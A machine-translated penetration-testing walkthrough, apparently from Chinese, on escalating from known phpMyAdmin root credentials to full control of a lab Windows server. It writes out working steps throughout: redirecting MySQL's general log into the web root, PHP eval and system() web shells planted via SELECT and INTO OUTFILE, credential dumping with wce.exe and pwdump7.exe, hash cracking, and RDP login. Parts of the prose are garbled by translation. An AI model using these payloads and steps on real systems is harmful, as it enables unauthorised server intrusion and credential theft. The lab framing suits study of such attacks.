Foreword: in the process of penetration test, we learned the account password of phpMyAdmin. How to withdraw the right? Looking down, I'd like to talk to you today about phpMyAdmin's rights.
0x00 definition
PhpMyAdmin is a MySQL database management tool based on PHP and constructed on the website host in the web base mode, which enables the administrator to manage MySQL database with the web interface.
0x01 environment preparation
目标: Windows Server 2003 Enterprise x64 Edition 192.168.17.137
攻击机: window7 192.168.17.132
Php:5.45
Mysql: 5.5.53
Apache: 2.4
0x02 start infiltration
We have learned that phpMyAdmin's account password is root root through weak password, explosion, directory disclosure and other channels. Next, we will raise the right through phpMyAdmin, as close to the truth as possible, and talk more about ideas.
A collect useful information
As shown in the figure above, we can get the following useful information.
- 1. The operating system is Windows Server 2003 x86
- 2. The server is Apache 2.4.32
- 3. The default path of the website is e: \ phpstudy \ phptutorial \ www
- 4. PHP version is 5.45
- MySQL version is 5.5.53
B. test insertion conditions
We have learned that the default path of the website is e: \ phpstudy \ phptutorial \ www. at this time, we must want to insert a backdoor file or export a shell. If we need to use one of the above two ideas, we must meet the precondition that the value corresponding to "secure file priv" cannot be empty, so we must check the value of "secure file priv" in advance.
PhpMyAdmin executes the following command:
SHOW VARIABLES LIKE "secure_file_priv";
The results are as follows:
It can be seen from the above figure that the value is empty. If we import a sentence at this time, it will definitely fail. Don't believe it, let's try.
The MySQL server is running with the -- secure file priv option so it cannot execute this statement. This is because MySQL has restrictions on file import and export, which is not allowed by default. If the default value is null, it is forbidden. If there is a folder directory, only files under the directory can be changed (neither can the test subdirectory). Let's think about whether we can set its path as our default website path, so that we can import a back door. Let's try.
It is known from the figure that this variable is a read-only variable and cannot be changed dynamically. It should only be changed from the configuration file. We find that we are stuck in a Hutong. That's not the normal way. We can use some ideas to insert a sentence in the log file.
C conversion ideas
The first thing we need to detect is the value of MySQL global variables (general log, general log file).
- General log refers to the saved state of the log. There are two values (on / off) in total: on for on and off for off.
- General log file refers to the saving path of the log.
It can be seen from the figure that the general_log is closed by default, and the location where the log is stored is e: \ phpstudy \ phptutorial \ MySQL \ data \.
First of all, let's understand the function of opening general? Log. Opening it can record every command entered by the user. It will be saved in a log file under E: \ phpstudy \ phptutorial \ MySQL \ data \, which is actually what we often call a log file. Well, the idea of our utilization is to open the general log and change the value of the general log file to a custom PHP file in the default path of our website. Then we write a sentence back to it through the log log, and then use it further.
The specific orders are:
set global general_log = "ON";
SET global general_log_file='E:/phpStudy/PHPTutorial/WWW/infos.php';
Next, we can see the pseudo journal file infos.php we generated under the root path of the website.
Then we'll have to insert a word in the back door.
select '<?php eval($_POST[yumu]);?>';
We can try to use the kitchen knife to connect successfully.
D get administrator password
0x00 get clear text directly
We upload wce.exe to get the clear text password. Lucky thief, get plaintext directly (password with 11 letters and numbers). If you can't get the plaintext directly, you have to go to the second item to get the hash value and decrypt it.
0x01 get hash value
Upload pwdump7.exe to get the hash value and save it in the password.txt file. You can choose to run online http://www.objectif-security.ch/en/ophtrack.php to get the hash value. If you can't run, import the rainbow table with ophtrack.
E check whether 3389 is on
Input "netstat - an | find" 3389 "or" netstat - an "directly at the kitchen knife terminal.
I found that 3389 didn't open, but 3390 opened. Let's try to connect.
F. log in to the server
Run mstsc to open the remote desktop.
Enter the account and password obtained above and log in successfully.
It must be clear at last, but I won't write here. There are many thieves in the content
0x03 extension
As shown above, if the value of secure file priv is empty, what should we do if secure file priv is not empty?
A configure my.ini file (does not correspond to the site root path)
Open mysq's configuration file my.ini, set the value of secure ﹣ file ﹣ priv, and restart mysql.
secure_file_priv = "E:/phpStudy/PHPTutorial/MYSQL/"
Try to change the value and find that it's only readable, not writable. In that case, we can't write one sentence to our website root directory because it limits the export path.
Bconfigure my.ini file (corresponding to the site root path)
Open mysq's configuration file my.ini, set the value of secure ﹣ file ﹣ priv, and restart mysql.
secure_file_priv = "E:/phpStudy/PHPTutorial/WWW/"
Then we try to insert a sentence back door and insert it successfully.
Two words do not say kitchen knife connection.
Of course, a sentence can be inserted like this.
CREATE TABLE `mysql`.`informationes` (`inform` TEXT NOT NULL);
INSERT INTO `mysql`.`informationes` (`inform`) VALUES ('<?php @eval($_POST[pass]);?>');
SELECT `inform` from `mysql`.`informationes` into outfile 'e:/phpStudy/PHPTutorial/WWW/infos.php';
DROP table if exists `mysql`.`informationes`;
(注意: c:/phpStudy/PHPTutorial/WWW/为网站的绝对路径)
C export the PHP file of shell with command permission
select '<?php echo \'<pre>\';system($_POST[\'yumu\']);echo \'</pre>\';?>' into outfile 'c:/phpStudy/PHPTutorial/WWW/test.php';
0x04 summary
The environment in this paper is to be close to the real environment as much as possible except for the WAF, and to simulate the real environment to analyze and explain ideas for you, hoping that you can get something.